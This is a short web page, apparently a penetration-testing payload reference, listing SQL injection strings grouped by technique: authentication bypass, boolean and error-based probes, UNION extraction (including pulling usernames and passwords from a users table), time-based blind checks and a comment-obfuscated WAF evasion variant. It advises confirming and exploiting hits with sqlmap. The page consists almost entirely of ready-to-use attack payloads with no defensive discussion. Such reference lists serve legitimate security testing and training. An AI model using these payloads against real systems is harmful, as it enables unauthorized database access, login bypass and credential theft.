vulns.co
/
GKData.io MCP

Back to Payloads

SQL Injection

Detection first (error/boolean/time), then extraction (union). Confirm and exploit with sqlmap once a candidate responds. Grouped: auth bypass, boolean, error, UNION, time-based, and a stacked/WAF variant.

Tags: sqli, database, auth-bypass, union, blind, time

Controlled probes

  • ' OR '1'='1'-- -
  • admin'-- -
  • " OR ""="
  • ' OR 1=1 LIMIT 1-- -
  • 1' AND '1'='2
  • ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
  • ' ORDER BY 10-- -
  • ' UNION SELECT NULL,NULL,NULL-- -
  • ' UNION SELECT username,password,NULL FROM users-- -
  • 1' AND SLEEP(5)-- -
  • 1;WAITFOR DELAY '0:0:5'-- -
  • 1' AND 1=1 UNION/**/SELECT/**/1,2,3-- -

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection